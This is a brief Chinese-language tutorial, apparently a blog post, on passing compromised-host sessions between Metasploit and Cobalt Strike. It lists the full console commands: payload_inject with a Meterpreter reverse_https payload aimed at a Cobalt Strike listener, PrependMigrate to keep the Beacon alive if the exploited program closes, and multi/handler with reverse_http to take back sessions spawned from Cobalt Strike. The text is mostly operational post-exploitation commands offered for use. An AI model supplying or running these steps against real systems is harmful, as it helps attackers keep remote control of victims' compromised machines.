0x01 MSF會話傳遞到CS
1、 CS上的操作
點擊Cobalt Strike然后選擇監聽器,創建一個HTTPS Beacon的監聽器即可
創建成功后如下
2、 MSF上的操作
前提是已經獲取到了shell,如下:
3、 開始傳遞會話
首先,background會話
background
接着調用payload_inject模塊
use exploit/windows/local/payload_inject
設置HTTPS Payload
set payload windows/meterpreter/reverse_https
設置lhost與lport為CS的監聽器的IP與端口
set lhost x.x.x.x
set lport 5555
設置DisablePyaloadHandler為True,這個選項會讓MSF避免在其內起一個handler來服務你的payload連接,就是告訴MSF我們已經建立了監聽器,不需要再新建監聽器了
set DisablePayloadHandler True
設置PrependMigrate為True,這個設置讓MSF前置的shellcode在另一個進程當中運行payload stager,如果被利用的應用程序奔潰或者被用戶關閉,這個會幫助Beacon會話存活。
set PrependMigrate True
設置當前會話
set session 1
開始傳遞會話
exploit
整體過程如下:
此時,CS上已經可以看到MSF的會話傳遞過來了
0x02 CS會話傳遞到MSF
1、Cobalt Strike上的操作
先讓機子上線CS
2、MSF上的操作
首先,在MSF上調用handler模塊
use exploit/multi/handler
設置HTTP Payload
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x
set lport 6677
運行該模塊
run
整體過程如下:
3、開始會話傳遞
在CS上先創建一個Foreign HTTP監聽,IP和端口設置成上面MSF所設置handler模塊的端口和IP
之后在CS上面右擊待傳遞的會話,選擇Spawn,選擇剛剛創建的Foreign HTTP監聽器
來到MSF就可以看見CS的會話已經傳遞過來了